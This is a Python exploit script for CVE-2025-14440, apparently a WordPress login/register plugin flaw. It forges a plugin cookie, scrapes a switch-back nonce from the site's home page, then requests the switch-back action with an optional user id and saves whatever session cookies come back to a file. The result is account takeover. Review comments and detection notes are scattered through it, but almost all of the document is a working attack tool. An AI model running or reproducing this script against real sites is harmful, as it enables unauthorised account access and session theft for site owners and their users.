# -*- coding: utf-8 -*-
# By: Nxploited
# GitHub: https://github.com/Nxploited
# Telegram: https://t.me/Nxploited
import sys
import requests
import re
import os
import argparse
import logging
from urllib.parse import urlparse, urlunparse
# Attribution strings; main() echoes them in the start-up banner.
SCRIPT_AUTHOR = "Nxploited"
GITHUB = "https://github.com/Nxploited"
TELEGRAM = "https://t.me/Nxploited"

# Sent unchanged with every request this script makes. The fixed User-Agent
# and the jay_login_register_switched_from_user cookie are constant strings,
# so a WAF or request-logging rule can match on either of them.
HEADERS = {
    "User-Agent": "Mozilla/5.0 (Nxploited Exploit Script)",
    "Accept": "*/*",
    "Connection": "close",
    "Cookie": "jay_login_register_switched_from_user=1"
}

# Captures the hex run (10 or more characters) that follows "_wpnonce=".
NONCE_REGEX = r'_wpnonce=([a-fA-F0-9]{10,})'

# Session cookies are appended to this file, relative to the working directory.
COOKIE_FILENAME = "extracted_cookies.txt"

# Per-request timeout handed to requests, in seconds.
TIMEOUT = 8

LOG_FORMAT = "[%(levelname)s] %(message)s"
logging.basicConfig(
    level=logging.INFO,
    format=LOG_FORMAT,
)

# Every request in this file passes verify=False. Silencing the warning that
# urllib3 raises for that means certificate problems are never reported.
requests.packages.urllib3.disable_warnings(
    category=requests.packages.urllib3.exceptions.InsecureRequestWarning
)
def sanitize_url(url):
    """Turn a user-supplied target into an absolute URL string.

    Characters that cannot be encoded as UTF-8 are dropped, ``http://`` is
    prepended when the value does not already start with http:// or https://,
    and the path component is passed through ``os.path.normpath``.

    NOTE(review): ``os.path.normpath`` is a filesystem helper, not a URL one.
    An empty path comes back as ``.`` (``example.com`` becomes
    ``http://example.com/.``), a trailing slash is dropped, and the result
    depends on the host OS path rules.
    """
    cleaned = url.encode('utf-8', 'ignore').decode('utf-8', 'ignore')
    has_scheme = cleaned.lower().startswith(("http://", "https://"))
    if not has_scheme:
        cleaned = "http://" + cleaned
    scheme, netloc, path, params, query, fragment = urlparse(cleaned)
    normalised = (scheme, netloc, os.path.normpath(path), params, query, fragment)
    return urlunparse(normalised)
def extract_nonce(target_url):
    """Fetch the site root and read the ``_wpnonce`` from the switch-back link.

    Issues one GET (module-level HEADERS, TLS verification disabled) to the
    target with exactly one trailing slash, looks for an ``href`` attribute
    containing ``jay_login_register_switch_back`` and applies NONCE_REGEX to
    that attribute.

    Returns the nonce string. Returns None when the status is not 200, the
    link is absent, the link carries no nonce, or any exception occurs; each
    case is logged and nothing is raised.
    """
    # NOTE(review): the link is only searched for in a response to a request
    # that carries the cookie set in HEADERS; whether the server renders it
    # for such a request is the precondition this function probes.
    try:
        resp = requests.get(
            target_url.rstrip('/') + '/',
            headers=HEADERS,
            verify=False,
            timeout=TIMEOUT,
        )
        if resp.status_code != 200:
            logging.error(f"Initial request returned status code {resp.status_code}")
            return None

        link = re.search(r'href="[^"]*jay_login_register_switch_back[^"]*"', resp.text)
        if link is None:
            logging.error("Could not find the switch_back link in response.")
            return None

        found = re.search(NONCE_REGEX, link.group(0))
        if found is None:
            logging.error("Nonce not found in the href attribute.")
            return None
        return found.group(1)
    except Exception as e:
        logging.error(f"Exception extracting nonce: {e}")
        return None
def exploit(target_url, nonce, user_id):
    """Send the switch-back request and report whether any cookie came back.

    Issues one GET to the site root with ``action`` and ``_wpnonce`` query
    parameters, plus ``id`` when ``user_id`` is truthy. If the session holds
    at least one cookie afterwards, the cookies are logged, handed to
    store_cookie() and True is returned. Otherwise a warning is logged and
    False is returned. Exceptions are logged and also yield False.

    Detection: server-side this is a GET to the site root whose query string
    contains ``action=jay_login_register_switch_back`` and ``_wpnonce=``
    (optionally ``id=``), with the request Cookie and User-Agent values from
    HEADERS.
    """
    query = {"action": "jay_login_register_switch_back", "_wpnonce": nonce}
    if user_id:
        query["id"] = user_id

    try:
        with requests.Session() as session:
            session.headers.update(HEADERS)
            session.get(
                target_url.rstrip('/') + '/',
                params=query,
                verify=False,
                timeout=TIMEOUT,
            )
            # Any cookie in the jar counts as success; the names are not
            # checked, so unrelated cookies are treated the same way.
            jar = session.cookies.get_dict()
            if not jar:
                logging.warning("No cookies returned. Exploitation may have failed.")
                return False

            cookie_str = "; ".join(f"{k}={v}" for k, v in jar.items())
            logging.info(f"[SUCCESS] Exploitation successful. Cookies:\n {cookie_str}")
            store_cookie(target_url, cookie_str)
            return True
    except Exception as e:
        logging.error(f"Exception during exploit: {e}")
        return False
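def store_cookie(target_url, cookie_str):
    """Append ``<scheme>://<host>: <cookies>`` as one line to COOKIE_FILENAME.

    The line holds session cookies, which are credentials, so the file is
    created with owner-only permissions (0o600) instead of the process
    default. A file that already exists keeps whatever mode it has.

    Failures are logged and swallowed; nothing is returned.
    """
    try:
        parsed = urlparse(target_url)
        site = f"{parsed.scheme}://{parsed.netloc}"
        # os.open lets the creation mode be set; plain open() would create
        # the file readable by whoever the umask allows.
        fd = os.open(
            COOKIE_FILENAME,
            os.O_WRONLY | os.O_APPEND | os.O_CREAT,
            0o600,
        )
        with os.fdopen(fd, "a", encoding="utf-8") as f:
            f.write(f'{site}: {cookie_str}\n')
        logging.info(f"[INFO] Cookies saved to: {COOKIE_FILENAME}")
    except Exception as e:
        logging.error(f"Failed to store cookies: {e}")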
def main():
    """Command-line entry point.

    Parses ``-u/--url`` (required) and ``-id/--id`` (optional), prints the
    banner, normalises the URL and calls extract_nonce() followed by
    exploit(). Exits with status 1 when no nonce is obtained.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2025-14440 | Exploit By Nxploited (Khaled Alenazi)"
    )
    parser.add_argument(
        '-u', '--url',
        required=True,
        help="Target URL (with or without http/https)",
    )
    parser.add_argument(
        '-id', '--id',
        required=False,
        help="User ID to use for exploitation",
    )
    args = parser.parse_args()

    rule = "======================================================="
    banner = (
        rule,
        f"# CVE-2025-14440 | Exploit By {SCRIPT_AUTHOR} (Khaled Alenazi)",
        f"# GitHub: {GITHUB}",
        f"# Telegram: {TELEGRAM}",
        rule,
    )
    for banner_line in banner:
        print(banner_line)

    target_url = sanitize_url(args.url)
    user_id = args.id
    logging.info("Sanitized target URL: %s", target_url)

    logging.info("Attempting to extract Nonce...")
    nonce = extract_nonce(target_url)
    if not nonce:
        # Without a nonce the second request is not attempted.
        logging.error("Failed to extract nonce! Exiting.")
        sys.exit(1)
    logging.info(f"Extracted nonce: {nonce}")

    logging.info("Attempting exploitation...")
    succeeded = exploit(target_url, nonce, user_id)
    if succeeded:
        logging.info("Exploit process completed. Check extracted_cookies.txt.")
    else:
        logging.warning("Exploit did not yield cookies. Target may not be vulnerable or input may be incorrect.")


if __name__ == "__main__":
    main()